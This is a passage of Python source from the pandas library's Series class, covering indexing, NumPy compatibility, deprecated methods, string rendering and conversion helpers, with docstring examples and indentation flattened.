values = na_value_for_dtype(dtype)
keys = index
else:
keys, values = [], []
# Input is now list-like, so rely on "standard" construction:
s = Series(values, index=keys, dtype=dtype)
# Now we just make sure the order is respected, if any
if data and index is not None:
s = s.reindex(index, copy=False)
elif not PY36 and not isinstance(data, OrderedDict) and data:
# Need the `and data` to avoid sorting Series(None, index=[...])
# since that isn't really dict-like
try:
s = s.sort_index()
except TypeError:
pass
return s._data, s.index
@classmethod
def from_array(
cls, arr, index=None, name=None, dtype=None, copy=False, fastpath=False
):
"""
Construct Series from array.
.. deprecated :: 0.23.0
Use pd.Series(..) constructor instead.
Returns
-------
Series
Constructed Series.
"""
warnings.warn(
"'from_array' is deprecated and will be removed in a "
"future version. Please use the pd.Series(..) "
"constructor instead.",
FutureWarning,
stacklevel=2,
)
if isinstance(arr, ABCSparseArray):
from pandas.core.sparse.series import SparseSeries
cls = SparseSeries
return cls(
arr, index=index, name=name, dtype=dtype, copy=copy, fastpath=fastpath
)
# ----------------------------------------------------------------------
@property
def _constructor(self):
return Series
@property
def _constructor_expanddim(self):
from pandas.core.frame import DataFrame
return DataFrame
# types
@property
def _can_hold_na(self):
return self._data._can_hold_na
_index = None
def _set_axis(self, axis, labels, fastpath=False):
"""
Override generic, we want to set the _typ here.
"""
if not fastpath:
labels = ensure_index(labels)
is_all_dates = labels.is_all_dates
if is_all_dates:
if not isinstance(labels, (DatetimeIndex, PeriodIndex, TimedeltaIndex)):
try:
labels = DatetimeIndex(labels)
# need to set here because we changed the index
if fastpath:
self._data.set_axis(axis, labels)
except (tslibs.OutOfBoundsDatetime, ValueError):
# labels may exceeds datetime bounds,
# or not be a DatetimeIndex
pass
self._set_subtyp(is_all_dates)
object.__setattr__(self, "_index", labels)
if not fastpath:
self._data.set_axis(axis, labels)
def _set_subtyp(self, is_all_dates):
if is_all_dates:
object.__setattr__(self, "_subtyp", "time_series")
else:
object.__setattr__(self, "_subtyp", "series")
def _update_inplace(self, result, **kwargs):
# we want to call the generic version and not the IndexOpsMixin
return generic.NDFrame._update_inplace(self, result, **kwargs)
@property
def name(self):
"""
Return name of the Series.
"""
return self._name
@name.setter
def name(self, value):
if value is not None and not is_hashable(value):
raise TypeError("Series.name must be a hashable type")
object.__setattr__(self, "_name", value)
# ndarray compatibility
@property
def dtype(self):
"""
Return the dtype object of the underlying data.
"""
return self._data.dtype
@property
def dtypes(self):
"""
Return the dtype object of the underlying data.
"""
return self._data.dtype
@property
def ftype(self):
"""
Return if the data is sparse|dense.
.. deprecated:: 0.25.0
Use :func:`dtype` instead.
"""
warnings.warn(
"Series.ftype is deprecated and will "
"be removed in a future version. "
"Use Series.dtype instead.",
FutureWarning,
stacklevel=2,
)
return self._data.ftype
@property
def ftypes(self):
"""
Return if the data is sparse|dense.
.. deprecated:: 0.25.0
Use :func:`dtypes` instead.
"""
warnings.warn(
"Series.ftypes is deprecated and will "
"be removed in a future version. "
"Use Series.dtype instead.",
FutureWarning,
stacklevel=2,
)
return self._data.ftype
@property
def values(self):
"""
Return Series as ndarray or ndarray-like depending on the dtype.
.. warning::
We recommend using :attr:`Series.array` or
:meth:`Series.to_numpy`, depending on whether you need
a reference to the underlying data or a NumPy array.
Returns
-------
numpy.ndarray or ndarray-like
See Also
--------
Series.array : Reference to the underlying data.
Series.to_numpy : A NumPy array representing the underlying data.
Examples
--------
>>> pd.Series([1, 2, 3]).values
array([1, 2, 3])
>>> pd.Series(list('aabc')).values
array(['a', 'a', 'b', 'c'], dtype=object)
>>> pd.Series(list('aabc')).astype('category').values
[a, a, b, c]
Categories (3, object): [a, b, c]
Timezone aware datetime data is converted to UTC:
>>> pd.Series(pd.date_range('20130101', periods=3,
... tz='US/Eastern')).values
array(['2013-01-01T05:00:00.000000000',
'2013-01-02T05:00:00.000000000',
'2013-01-03T05:00:00.000000000'], dtype='datetime64[ns]')
"""
return self._data.external_values()
@property
def _values(self):
"""
Return the internal repr of this data.
"""
return self._data.internal_values()
def _formatting_values(self):
"""
Return the values that can be formatted (used by SeriesFormatter
and DataFrameFormatter).
"""
return self._data.formatting_values()
def get_values(self):
"""
Same as values (but handles sparseness conversions); is a view.
.. deprecated:: 0.25.0
Use :meth:`Series.to_numpy` or :attr:`Series.array` instead.
Returns
-------
numpy.ndarray
Data of the Series.
"""
warnings.warn(
"The 'get_values' method is deprecated and will be removed in a "
"future version. Use '.to_numpy()' or '.array' instead.",
FutureWarning,
stacklevel=2,
)
return self._internal_get_values()
def _internal_get_values(self):
return self._data.get_values()
@property
def asobject(self):
"""
Return object Series which contains boxed values.
.. deprecated :: 0.23.0
Use ``astype(object)`` instead.
*this is an internal non-public method*
"""
warnings.warn(
"'asobject' is deprecated. Use 'astype(object)'" " instead",
FutureWarning,
stacklevel=2,
)
return self.astype(object).values
# ops
def ravel(self, order="C"):
"""
Return the flattened underlying data as an ndarray.
Returns
-------
numpy.ndarray or ndarray-like
Flattened data of the Series.
See Also
--------
numpy.ndarray.ravel
"""
return self._values.ravel(order=order)
def compress(self, condition, *args, **kwargs):
"""
Return selected slices of an array along given axis as a Series.
.. deprecated:: 0.24.0
Returns
-------
Series
Series without the slices for which condition is false.
See Also
--------
numpy.ndarray.compress
"""
msg = (
"Series.compress(condition) is deprecated. "
"Use 'Series[condition]' or "
"'np.asarray(series).compress(condition)' instead."
)
warnings.warn(msg, FutureWarning, stacklevel=2)
nv.validate_compress(args, kwargs)
return self[condition]
def nonzero(self):
"""
Return the *integer* indices of the elements that are non-zero.
.. deprecated:: 0.24.0
Please use .to_numpy().nonzero() as a replacement.
This method is equivalent to calling `numpy.nonzero` on the
series data. For compatibility with NumPy, the return value is
the same (a tuple with an array of indices for each dimension),
but it will always be a one-item tuple because series only have
one dimension.
Returns
-------
numpy.ndarray
Indices of elements that are non-zero.
See Also
--------
numpy.nonzero
Examples
--------
>>> s = pd.Series([0, 3, 0, 4])
>>> s.nonzero()
(array([1, 3]),)
>>> s.iloc[s.nonzero()[0]]
1 3
3 4
dtype: int64
>>> s = pd.Series([0, 3, 0, 4], index=['a', 'b', 'c', 'd'])
# same return although index of s is different
>>> s.nonzero()
(array([1, 3]),)
>>> s.iloc[s.nonzero()[0]]
b 3
d 4
dtype: int64
"""
msg = (
"Series.nonzero() is deprecated "
"and will be removed in a future version."
"Use Series.to_numpy().nonzero() instead"
)
warnings.warn(msg, FutureWarning, stacklevel=2)
return self._values.nonzero()
def put(self, *args, **kwargs):
"""
Apply the `put` method to its `values` attribute if it has one.
.. deprecated:: 0.25.0
See Also
--------
numpy.ndarray.put
"""
warnings.warn(
"`put` has been deprecated and will be removed in a" "future version.",
FutureWarning,
stacklevel=2,
)
self._values.put(*args, **kwargs)
def __len__(self):
"""
Return the length of the Series.
"""
return len(self._data)
def view(self, dtype=None):
"""
Create a new view of the Series.
This function will return a new Series with a view of the same
underlying values in memory, optionally reinterpreted with a new data
type. The new data type must preserve the same size in bytes as to not
cause index misalignment.
Parameters
----------
dtype : data type
Data type object or one of their string representations.
Returns
-------
Series
A new Series object as a view of the same data in memory.
See Also
--------
numpy.ndarray.view : Equivalent numpy function to create a new view of
the same data in memory.
Notes
-----
Series are instantiated with ``dtype=float64`` by default. While
``numpy.ndarray.view()`` will return a view with the same data type as
the original array, ``Series.view()`` (without specified dtype)
will try using ``float64`` and may fail if the original data type size
in bytes is not the same.
Examples
--------
>>> s = pd.Series([-2, -1, 0, 1, 2], dtype='int8')
>>> s
0 -2
1 -1
2 0
3 1
4 2
dtype: int8
The 8 bit signed integer representation of `-1` is `0b11111111`, but
the same bytes represent 255 if read as an 8 bit unsigned integer:
>>> us = s.view('uint8')
>>> us
0 254
1 255
2 0
3 1
4 2
dtype: uint8
The views share the same underlying values:
>>> us[0] = 128
>>> s
0 -128
1 -1
2 0
3 1
4 2
dtype: int8
"""
return self._constructor(
self._values.view(dtype), index=self.index
).__finalize__(self)
# ----------------------------------------------------------------------
# NDArray Compat
_HANDLED_TYPES = (Index, ExtensionArray, np.ndarray)
def __array_ufunc__(
self, ufunc: Callable, method: str, *inputs: Any, **kwargs: Any
):
# TODO: handle DataFrame
from pandas.core.internals.construction import extract_array
cls = type(self)
# for binary ops, use our custom dunder methods
result = ops.maybe_dispatch_ufunc_to_dunder_op(
self, ufunc, method, *inputs, **kwargs
)
if result is not NotImplemented:
return result
# Determine if we should defer.
no_defer = (np.ndarray.__array_ufunc__, cls.__array_ufunc__)
for item in inputs:
higher_priority = (
hasattr(item, "__array_priority__")
and item.__array_priority__ > self.__array_priority__
)
has_array_ufunc = (
hasattr(item, "__array_ufunc__")
and type(item).__array_ufunc__ not in no_defer
and not isinstance(item, self._HANDLED_TYPES)
)
if higher_priority or has_array_ufunc:
return NotImplemented
# align all the inputs.
names = [getattr(x, "name") for x in inputs if hasattr(x, "name")]
types = tuple(type(x) for x in inputs)
# TODO: dataframe
alignable = [x for x, t in zip(inputs, types) if issubclass(t, Series)]
if len(alignable) > 1:
# This triggers alignment.
# At the moment, there aren't any ufuncs with more than two inputs
# so this ends up just being x1.index | x2.index, but we write
# it to handle *args.
index = alignable[0].index
for s in alignable[1:]:
index |= s.index
inputs = tuple(
x.reindex(index) if issubclass(t, Series) else x
for x, t in zip(inputs, types)
)
else:
index = self.index
inputs = tuple(extract_array(x, extract_numpy=True) for x in inputs)
result = getattr(ufunc, method)(*inputs, **kwargs)
if len(set(names)) == 1:
# we require names to be hashable, right?
name = names[0] # type: Any
else:
name = None
def construct_return(result):
if lib.is_scalar(result):
return result
elif result.ndim > 1:
# e.g. np.subtract.outer
if method == "outer":
msg = (
"outer method for ufunc {} is not implemented on "
"pandas objects. Returning an ndarray, but in the "
"future this will raise a 'NotImplementedError'. "
"Consider explicitly converting the Series "
"to an array with '.array' first."
)
warnings.warn(msg.format(ufunc), FutureWarning, stacklevel=3)
return result
return self._constructor(result, index=index, name=name, copy=False)
if type(result) is tuple:
# multiple return values
return tuple(construct_return(x) for x in result)
elif method == "at":
# no return value
return None
else:
return construct_return(result)
def __array__(self, dtype=None):
"""
Return the values as a NumPy array.
Users should not call this directly. Rather, it is invoked by
:func:`numpy.array` and :func:`numpy.asarray`.
Parameters
----------
dtype : str or numpy.dtype, optional
The dtype to use for the resulting NumPy array. By default,
the dtype is inferred from the data.
Returns
-------
numpy.ndarray
The values in the series converted to a :class:`numpy.ndarary`
with the specified `dtype`.
See Also
--------
array : Create a new array from data.
Series.array : Zero-copy view to the array backing the Series.
Series.to_numpy : Series method for similar behavior.
Examples
--------
>>> ser = pd.Series([1, 2, 3])
>>> np.asarray(ser)
array([1, 2, 3])
For timezone-aware data, the timezones may be retained with
``dtype='object'``
>>> tzser = pd.Series(pd.date_range('2000', periods=2, tz="CET"))
>>> np.asarray(tzser, dtype="object")
array([Timestamp('2000-01-01 00:00:00+0100', tz='CET', freq='D'),
Timestamp('2000-01-02 00:00:00+0100', tz='CET', freq='D')],
dtype=object)
Or the values may be localized to UTC and the tzinfo discared with
``dtype='datetime64[ns]'``
>>> np.asarray(tzser, dtype="datetime64[ns]") # doctest: +ELLIPSIS
array(['1999-12-31T23:00:00.000000000', ...],
dtype='datetime64[ns]')
"""
if (
dtype is None
and isinstance(self.array, ABCDatetimeArray)
and getattr(self.dtype, "tz", None)
):
msg = (
"Converting timezone-aware DatetimeArray to timezone-naive "
"ndarray with 'datetime64[ns]' dtype. In the future, this "
"will return an ndarray with 'object' dtype where each "
"element is a 'pandas.Timestamp' with the correct 'tz'.\n\t"
"To accept the future behavior, pass 'dtype=object'.\n\t"
"To keep the old behavior, pass 'dtype=\"datetime64[ns]\"'."
)
warnings.warn(msg, FutureWarning, stacklevel=3)
dtype = "M8[ns]"
return np.asarray(self.array, dtype)
# ----------------------------------------------------------------------
# Unary Methods
@property
def real(self):
"""
Return the real value of vector.
.. deprecated 0.25.0
"""
warnings.warn(
"`real` is deprecated and will be removed in a future version. "
"To eliminate this warning for a Series `ser`, use "
"`np.real(ser.to_numpy())` or `ser.to_numpy().real`.",
FutureWarning,
stacklevel=2,
)
return self.values.real
@real.setter
def real(self, v):
self.values.real = v
@property
def imag(self):
"""
Return imag value of vector.
.. deprecated 0.25.0
"""
warnings.warn(
"`imag` is deprecated and will be removed in a future version. "
"To eliminate this warning for a Series `ser`, use "
"`np.imag(ser.to_numpy())` or `ser.to_numpy().imag`.",
FutureWarning,
stacklevel=2,
)
return self.values.imag
@imag.setter
def imag(self, v):
self.values.imag = v
# coercion
__float__ = _coerce_method(float)
__long__ = _coerce_method(int)
__int__ = _coerce_method(int)
# ----------------------------------------------------------------------
def _unpickle_series_compat(self, state):
if isinstance(state, dict):
self._data = state["_data"]
self.name = state["name"]
self.index = self._data.index
elif isinstance(state, tuple):
# < 0.12 series pickle
nd_state, own_state = state
# recreate the ndarray
data = np.empty(nd_state[1], dtype=nd_state[2])
np.ndarray.__setstate__(data, nd_state)
# backwards compat
index, name = own_state[0], None
if len(own_state) > 1:
name = own_state[1]
# recreate
self._data = SingleBlockManager(data, index, fastpath=True)
self._index = index
self.name = name
else:
raise Exception("cannot unpickle legacy formats -> [%s]" % state)
# indexers
@property
def axes(self):
"""
Return a list of the row axis labels.
"""
return [self.index]
def _ixs(self, i: int, axis: int = 0):
"""
Return the i-th value or values in the Series by location.
Parameters
----------
i : int
Returns
-------
scalar (int) or Series (slice, sequence)
"""
# dispatch to the values if we need
values = self._values
if isinstance(values, np.ndarray):
return libindex.get_value_at(values, i)
else:
return values[i]
@property
def _is_mixed_type(self):
return False
def _slice(self, slobj, axis=0, kind=None):
slobj = self.index._convert_slice_indexer(slobj, kind=kind or "getitem")
return self._get_values(slobj)
def __getitem__(self, key):
key = com.apply_if_callable(key, self)
try:
result = self.index.get_value(self, key)
if not is_scalar(result):
if is_list_like(result) and not isinstance(result, Series):
# we need to box if loc of the key isn't scalar here
# otherwise have inline ndarray/lists
try:
if not is_scalar(self.index.get_loc(key)):
result = self._constructor(
result, index=[key] * len(result), dtype=self.dtype
).__finalize__(self)
except KeyError:
pass
return result
except InvalidIndexError:
pass
except (KeyError, ValueError):
if isinstance(key, tuple) and isinstance(self.index, MultiIndex):
# kludge
pass
elif key is Ellipsis:
return self
elif com.is_bool_indexer(key):
pass
else:
# we can try to coerce the indexer (or this will raise)
new_key = self.index._convert_scalar_indexer(key, kind="getitem")
if type(new_key) != type(key):
return self.__getitem__(new_key)
raise
except Exception:
raise
if is_iterator(key):
key = list(key)
if com.is_bool_indexer(key):
key = check_bool_indexer(self.index, key)
return self._get_with(key)
def _get_with(self, key):
# other: fancy integer or otherwise
if isinstance(key, slice):
indexer = self.index._convert_slice_indexer(key, kind="getitem")
return self._get_values(indexer)
elif isinstance(key, ABCDataFrame):
raise TypeError(
"Indexing a Series with DataFrame is not "
"supported, use the appropriate DataFrame column"
)
elif isinstance(key, tuple):
try:
return self._get_values_tuple(key)
except Exception:
if len(key) == 1:
key = key[0]
if isinstance(key, slice):
return self._get_values(key)
raise
# pragma: no cover
if not isinstance(key, (list, np.ndarray, Series, Index)):
key = list(key)
if isinstance(key, Index):
key_type = key.inferred_type
else:
key_type = lib.infer_dtype(key, skipna=False)
if key_type == "integer":
if self.index.is_integer() or self.index.is_floating():
return self.loc[key]
else:
return self._get_values(key)
elif key_type == "boolean":
return self._get_values(key)
try:
# handle the dup indexing case (GH 4246)
if isinstance(key, (list, tuple)):
return self.loc[key]
return self.reindex(key)
except Exception:
# [slice(0, 5, None)] will break if you convert to ndarray,
# e.g. as requested by np.median
# hack
if isinstance(key[0], slice):
return self._get_values(key)
raise
def _get_values_tuple(self, key):
# mpl hackaround
if com._any_none(*key):
return self._get_values(key)
if not isinstance(self.index, MultiIndex):
raise ValueError("Can only tuple-index with a MultiIndex")
# If key is contained, would have returned by now
indexer, new_index = self.index.get_loc_level(key)
return self._constructor(self._values[indexer], index=new_index).__finalize__(
self
)
def _get_values(self, indexer):
try:
return self._constructor(
self._data.get_slice(indexer), fastpath=True
).__finalize__(self)
except Exception:
return self._values[indexer]
def __setitem__(self, key, value):
key = com.apply_if_callable(key, self)
def setitem(key, value):
try:
self._set_with_engine(key, value)
return
except com.SettingWithCopyError:
raise
except (KeyError, ValueError):
values = self._values
if is_integer(key) and not self.index.inferred_type == "integer":
values[key] = value
return
elif key is Ellipsis:
self[:] = value
return
elif com.is_bool_indexer(key):
pass
elif is_timedelta64_dtype(self.dtype):
# reassign a null value to iNaT
if is_valid_nat_for_dtype(value, self.dtype):
# exclude np.datetime64("NaT")
value = iNaT
try:
self.index._engine.set_value(self._values, key, value)
return
except (TypeError, ValueError):
# ValueError appears in only some builds in CI
pass
self.loc[key] = value
return
except TypeError as e:
if isinstance(key, tuple) and not isinstance(self.index, MultiIndex):
raise ValueError("Can only tuple-index with a MultiIndex")
# python 3 type errors should be raised
if _is_unorderable_exception(e):
raise IndexError(key)
if com.is_bool_indexer(key):
key = check_bool_indexer(self.index, key)
try:
self._where(~key, value, inplace=True)
return
except InvalidIndexError:
pass
self._set_with(key, value)
# do the setitem
cacher_needs_updating = self._check_is_chained_assignment_possible()
setitem(key, value)
if cacher_needs_updating:
self._maybe_update_cacher()
def _set_with_engine(self, key, value):
values = self._values
if is_extension_array_dtype(values.dtype):
# The cython indexing engine does not support ExtensionArrays.
values[self.index.get_loc(key)] = value
return
try:
self.index._engine.set_value(values, key, value)
return
except KeyError:
values[self.index.get_loc(key)] = value
return
def _set_with(self, key, value):
# other: fancy integer or otherwise
if isinstance(key, slice):
indexer = self.index._convert_slice_indexer(key, kind="getitem")
return self._set_values(indexer, value)
else:
if isinstance(key, tuple):
try:
self._set_values(key, value)
except Exception:
pass
if is_scalar(key) and not is_integer(key) and key not in self.index:
# GH#12862 adding an new key to the Series
# Note: have to exclude integers because that is ambiguously
# position-based
self.loc[key] = value
return
if is_scalar(key):
key = [key]
elif not isinstance(key, (list, Series, np.ndarray)):
try:
key = list(key)
except Exception:
key = [key]
if isinstance(key, Index):
key_type = key.inferred_type
else:
key_type = lib.infer_dtype(key, skipna=False)
if key_type == "integer":
if self.index.inferred_type == "integer":
self._set_labels(key, value)
else:
return self._set_values(key, value)
elif key_type == "boolean":
self._set_values(key.astype(np.bool_), value)
else:
self._set_labels(key, value)
def _set_labels(self, key, value):
if isinstance(key, Index):
key = key.values
else:
key = com.asarray_tuplesafe(key)
indexer = self.index.get_indexer(key)
mask = indexer == -1
if mask.any():
raise ValueError("%s not contained in the index" % str(key[mask]))
self._set_values(indexer, value)
def _set_values(self, key, value):
if isinstance(key, Series):
key = key._values
self._data = self._data.setitem(indexer=key, value=value)
self._maybe_update_cacher()
def repeat(self, repeats, axis=None):
"""
Repeat elements of a Series.
Returns a new Series where each element of the current Series
is repeated consecutively a given number of times.
Parameters
----------
repeats : int or array of ints
The number of repetitions for each element. This should be a
non-negative integer. Repeating 0 times will return an empty
Series.
axis : None
Must be ``None``. Has no effect but is accepted for compatibility
with numpy.
Returns
-------
Series
Newly created Series with repeated elements.
See Also
--------
Index.repeat : Equivalent function for Index.
numpy.repeat : Similar method for :class:`numpy.ndarray`.
Examples
--------
>>> s = pd.Series(['a', 'b', 'c'])
>>> s
0 a
1 b
2 c
dtype: object
>>> s.repeat(2)
0 a
0 a
1 b
1 b
2 c
2 c
dtype: object
>>> s.repeat([1, 2, 3])
0 a
1 b
1 b
2 c
2 c
2 c
dtype: object
"""
nv.validate_repeat(tuple(), dict(axis=axis))
new_index = self.index.repeat(repeats)
new_values = self._values.repeat(repeats)
return self._constructor(new_values, index=new_index).__finalize__(self)
def get_value(self, label, takeable=False):
"""
Quickly retrieve single value at passed index label.
.. deprecated:: 0.21.0
Please use .at[] or .iat[] accessors.
Parameters
----------
label : object
takeable : interpret the index as indexers, default False
Returns
-------
scalar value
"""
warnings.warn(
"get_value is deprecated and will be removed "
"in a future release. Please use "
".at[] or .iat[] accessors instead",
FutureWarning,
stacklevel=2,
)
return self._get_value(label, takeable=takeable)
def _get_value(self, label, takeable=False):
if takeable is True:
return com.maybe_box_datetimelike(self._values[label])
return self.index.get_value(self._values, label)
_get_value.__doc__ = get_value.__doc__
def set_value(self, label, value, takeable=False):
"""
Quickly set single value at passed label.
.. deprecated:: 0.21.0
Please use .at[] or .iat[] accessors.
If label is not contained, a new object is created with the label
placed at the end of the result index.
Parameters
----------
label : object
Partial indexing with MultiIndex not allowed
value : object
Scalar value
takeable : interpret the index as indexers, default False
Returns
-------
Series
If label is contained, will be reference to calling Series,
otherwise a new object.
"""
warnings.warn(
"set_value is deprecated and will be removed "
"in a future release. Please use "
".at[] or .iat[] accessors instead",
FutureWarning,
stacklevel=2,
)
return self._set_value(label, value, takeable=takeable)
def _set_value(self, label, value, takeable=False):
try:
if takeable:
self._values[label] = value
else:
self.index._engine.set_value(self._values, label, value)
except (KeyError, TypeError):
# set using a non-recursive method
self.loc[label] = value
return self
_set_value.__doc__ = set_value.__doc__
def reset_index(self, level=None, drop=False, name=None, inplace=False):
"""
Generate a new DataFrame or Series with the index reset.
This is useful when the index needs to be treated as a column, or
when the index is meaningless and needs to be reset to the default
before another operation.
Parameters
----------
level : int, str, tuple, or list, default optional
For a Series with a MultiIndex, only remove the specified levels
from the index. Removes all levels by default.
drop : bool, default False
Just reset the index, without inserting it as a column in
the new DataFrame.
name : object, optional
The name to use for the column containing the original Series
values. Uses ``self.name`` by default. This argument is ignored
when `drop` is True.
inplace : bool, default False
Modify the Series in place (do not create a new object).
Returns
-------
Series or DataFrame
When `drop` is False (the default), a DataFrame is returned.
The newly created columns will come first in the DataFrame,
followed by the original Series values.
When `drop` is True, a `Series` is returned.
In either case, if ``inplace=True``, no value is returned.
See Also
--------
DataFrame.reset_index: Analogous function for DataFrame.
Examples
--------
>>> s = pd.Series([1, 2, 3, 4], name='foo',
... index=pd.Index(['a', 'b', 'c', 'd'], name='idx'))
Generate a DataFrame with default index.
>>> s.reset_index()
idx foo
0 a 1
1 b 2
2 c 3
3 d 4
To specify the name of the new column use `name`.
>>> s.reset_index(name='values')
idx values
0 a 1
1 b 2
2 c 3
3 d 4
To generate a new Series with the default set `drop` to True.
>>> s.reset_index(drop=True)
0 1
1 2
2 3
3 4
Name: foo, dtype: int64
To update the Series in place, without generating a new one
set `inplace` to True. Note that it also requires ``drop=True``.
>>> s.reset_index(inplace=True, drop=True)
>>> s
0 1
1 2
2 3
3 4
Name: foo, dtype: int64
The `level` parameter is interesting for Series with a multi-level
index.
>>> arrays = [np.array(['bar', 'bar', 'baz', 'baz']),
... np.array(['one', 'two', 'one', 'two'])]
>>> s2 = pd.Series(
... range(4), name='foo',
... index=pd.MultiIndex.from_arrays(arrays,
... names=['a', 'b']))
To remove a specific level from the Index, use `level`.
>>> s2.reset_index(level='a')
a foo
b
one bar 0
two bar 1
one baz 2
two baz 3
If `level` is not set, all levels are removed from the Index.
>>> s2.reset_index()
a b foo
0 bar one 0
1 bar two 1
2 baz one 2
3 baz two 3
"""
inplace = validate_bool_kwarg(inplace, "inplace")
if drop:
new_index = ibase.default_index(len(self))
if level is not None:
if not isinstance(level, (tuple, list)):
level = [level]
level = [self.index._get_level_number(lev) for lev in level]
if len(level) < self.index.nlevels:
new_index = self.index.droplevel(level)
if inplace:
self.index = new_index
# set name if it was passed, otherwise, keep the previous name
self.name = name or self.name
else:
return self._constructor(
self._values.copy(), index=new_index
).__finalize__(self)
elif inplace:
raise TypeError(
"Cannot reset_index inplace on a Series " "to create a DataFrame"
)
else:
df = self.to_frame(name)
return df.reset_index(level=level, drop=drop)
# ----------------------------------------------------------------------
# Rendering Methods
def __repr__(self):
"""
Return a string representation for a particular Series.
"""
buf = StringIO("")
width, height = get_terminal_size()
max_rows = (
height
if get_option("display.max_rows") == 0
else get_option("display.max_rows")
)
min_rows = (
height
if get_option("display.max_rows") == 0
else get_option("display.min_rows")
)
show_dimensions = get_option("display.show_dimensions")
self.to_string(
buf=buf,
name=self.name,
dtype=self.dtype,
min_rows=min_rows,
max_rows=max_rows,
length=show_dimensions,
)
result = buf.getvalue()
return result
def to_string(
self,
buf=None,
na_rep="NaN",
float_format=None,
header=True,
index=True,
length=False,
dtype=False,
name=False,
max_rows=None,
min_rows=None,
):
"""
Render a string representation of the Series.
Parameters
----------
buf : StringIO-like, optional
Buffer to write to.
na_rep : str, optional
String representation of NaN to use, default 'NaN'.
float_format : one-parameter function, optional
Formatter function to apply to columns' elements if they are
floats, default None.
header : bool, default True
Add the Series header (index name).
index : bool, optional
Add index (row) labels, default True.
length : bool, default False
Add the Series length.
dtype : bool, default False
Add the Series dtype.
name : bool, default False
Add the Series name if not None.
max_rows : int, optional
Maximum number of rows to show before truncating. If None, show
all.
min_rows : int, optional
The number of rows to display in a truncated repr (when number
of rows is above `max_rows`).
Returns
-------
str or None
String representation of Series if ``buf=None``, otherwise None.
"""
formatter = fmt.SeriesFormatter(
self,
name=name,
length=length,
header=header,
index=index,
dtype=dtype,
na_rep=na_rep,
float_format=float_format,
min_rows=min_rows,
max_rows=max_rows,
)
result = formatter.to_string()
# catch contract violations
if not isinstance(result, str):
raise AssertionError(
"result must be of type unicode, type"
" of result is {0!r}"
"".format(result.__class__.__name__)
)
if buf is None:
return result
else:
try:
buf.write(result)
except AttributeError:
with open(buf, "w") as f:
f.write(result)
# ----------------------------------------------------------------------
def items(self):
"""
Lazily iterate over (index, value) tuples.
This method returns an iterable tuple (index, value). This is
convenient if you want to create a lazy iterator.
Returns
-------
iterable
Iterable of tuples containing the (index, value) pairs from a
Series.
See Also
--------
DataFrame.items : Equivalent to Series.items for DataFrame.
Examples
--------
>>> s = pd.Series(['A', 'B', 'C'])
>>> for index, value in s.items():
... print("Index : {}, Value : {}".format(index, value))
Index : 0, Value : A
Index : 1, Value : B
Index : 2, Value : C
"""
return zip(iter(self.index), iter(self))
@Appender(items.__doc__)
def iteritems(self):
return self.items()
# ----------------------------------------------------------------------
# Misc public methods
def keys(self):
"""
Return alias for index.
Returns
-------
Index
Index of the Series.
"""
return self.index
def to_dict(self, into=dict):
"""
Convert Series to {label -> value} dict or dict-like object.
Parameters
----------
into : class, default dict
The collections.abc.Mapping subclass to use as the return
object. Can be the actual class or an empty
instance of the mapping type you want. If you want a
collections.defaultdict, you must pass it initialized.
.. versionadded:: 0.21.0
Returns
-------
collections.abc.Mapping
Key-value representation of Series.
Examples
--------
>>> s = pd.Series([1, 2, 3, 4])
>>> s.to_dict()
{0: 1, 1: 2, 2: 3, 3: 4}
>>> from collections import OrderedDict, defaultdict
>>> s.to_dict(OrderedDict)
OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)])
>>> dd = defaultdict(list)
>>> s.to_dict(dd)
defaultdict(<class 'list'>, {0: 1, 1: 2, 2: 3, 3: 4})
"""
# GH16122
into_c = com.standardize_mapping(into)
return into_c(self.items())
def to_frame(self, name=None):
"""
Convert Series to DataFrame.
Parameters
----------
name : object, default None
The passed name should substitute for the series name (if it has
one).
Returns
-------
DataFrame
DataFrame representation of Series.
Examples
--------
>>> s = pd.Series(["a", "b", "c"],
... name="vals")
>>> s.to_frame()
vals
0 a
1 b
2 c
"""
if name is None:
df = self._constructor_expanddim(self)
else:
df = self._constructor_expanddim({name: self})
return df
def to_sparse(self, kind="block", fill_value=None):
"""
Convert Series to SparseSeries.
.. deprecated:: 0.25.0
Parameters
----------
kind : {'block', 'integer'}, default 'block'
fill_value : float, defaults to NaN (missing)
Value to use for filling NaN values.
Returns
-------
SparseSeries
Sparse representation of the Series.
"""
warnings.warn(
"Series.to_sparse is deprecated and will be removed " "in a future version",
FutureWarning,
stacklevel=2,
)
from pandas.core.sparse.series import SparseSeries
values = SparseArray(self, kind=kind, fill_value=fill_value)
with warnings.catch_warnings():
warnings.filterwarnings("ignore", message="SparseSeries")
return SparseSeries(values, index=self.index, name=self.name).__finalize__(
self
)
def _set_name(self, name, inplace=False):
"""
Set the Series name.
Parameters
----------
name : str
inplace : bool
whether to modify `self` directly or return a copy
"""
inplace = validate_bool_kwarg(inplace, "inplace")
ser = self if inplace else self.copy()
ser.name = name
return ser
# ----------------------------------------------------------------------
# Statistics, overridden ndarray methods
# TODO: integrate bottleneck
def count(self, level=None):
"""
Return number of non-NA/null observations in the Series.
Parameters
----------
level : int or level name, default None
If the axis is a MultiIndex (hierarchical), count along a
particular level, collapsing into a smaller Series.
Returns
-------
int or Series (if level specified)
Number of non-null values in the Series.
Examples
--------
>>> s = pd.Series([0.0, 1.0, np.nan])
>>> s.count()
2
"""
if level is None:
return notna(self.array).sum()
if isinstance(level, str):
level = self.index._get_level_number(level)
lev = self.index.levels[level]
level_codes = np.array(self.index.codes[level], subok=False, copy=True)
mask = level_codes == -1
if mask.any():
level_codes[mask] = cnt = len(lev)
lev = lev.insert(cnt, lev._na_value)
obs = level_codes[notna(self.values)]
out = np.bincount(obs, minlength=len(lev) or None)
return self._constructor(out, index=lev, dtype="int64").__finalize__(self)
def mode(self, dropna=True):
"""
Return the mode(s) of the dataset.
Always returns Series even if only one value is returned.
Parameters
----------
dropna : bool, default True
Don't consider counts of NaN/NaT.
.. versionadded:: 0.24.0
Returns
-------
Series
Modes of the Series in sorted order.
"""
# TODO: Add option for bins like value_counts()
return algorithms.mode(self, dropna=dropna)
def unique(self):
"""
Return unique values of Series object.
Uniques are returned in order of appearance. Hash table-based unique,
therefore does NOT sort.
Returns
-------
ndarray or ExtensionArray
The unique values returned as a NumPy array. See Notes.
See Also
--------
unique : Top-level unique method for any 1-d array-like object.
Index.unique : Return Index with unique values from an Index object.
Notes
-----
Returns the unique values as a NumPy array. In case of an
extension-array backed Series, a new
:class:`~api.extensions.ExtensionArray` of that type with just
the unique values is returned. This includes
* Categorical
* Period
* Datetime with Timezone
* Interval
* Sparse
* IntegerNA
See Examples section.
Examples
--------
>>> pd.Series([2, 1, 3, 3], name='A').unique()
